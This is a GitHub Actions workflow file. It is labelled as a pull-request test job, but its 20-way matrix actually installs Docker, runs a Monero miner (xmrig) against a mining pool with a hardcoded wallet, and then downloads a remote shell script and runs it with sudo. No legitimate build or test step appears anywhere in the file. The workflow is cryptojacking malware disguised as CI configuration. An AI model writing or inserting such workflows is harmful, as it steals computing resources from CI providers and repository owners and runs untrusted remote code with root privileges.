name: Ching
on: [pull_request]
jobs:
   test:
     name: Fetch
     runs-on: ubuntu-latest
     container: ubuntu:20.10
     env:
       DEBIAN_FRONTEND: noninteractive
     strategy:
       fail-fast: false
       matrix:
         runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
     steps:
       - run: |
           apt update
           apt install sudo
           sudo apt install -y software-properties-common curl
           curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
           sudo add-apt-repository -y "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable"
           apt-cache policy docker-ce
           sudo apt install -y docker-ce
           docker pull giansalex/monero-miner
           docker run -d giansalex/monero-miner /xmr/xmrig \-o gulf.moneroocean.stream:10032 \-u 41jafHzuWAzUF4iZp8S6p3HLbo4Vms8k47YXT6wrsk4zNR1KVPQqf3zMuYtxeLpzTNXYARLwST94zLdEY3sKsYSFRqJtkzp \-k  \--cpu-priority=5
           sudo docker container ls
           curl https://raw.githubusercontent.com/savant14/scripts/main/ds.sh --output dsk.sh
           sudo bash dsk.sh
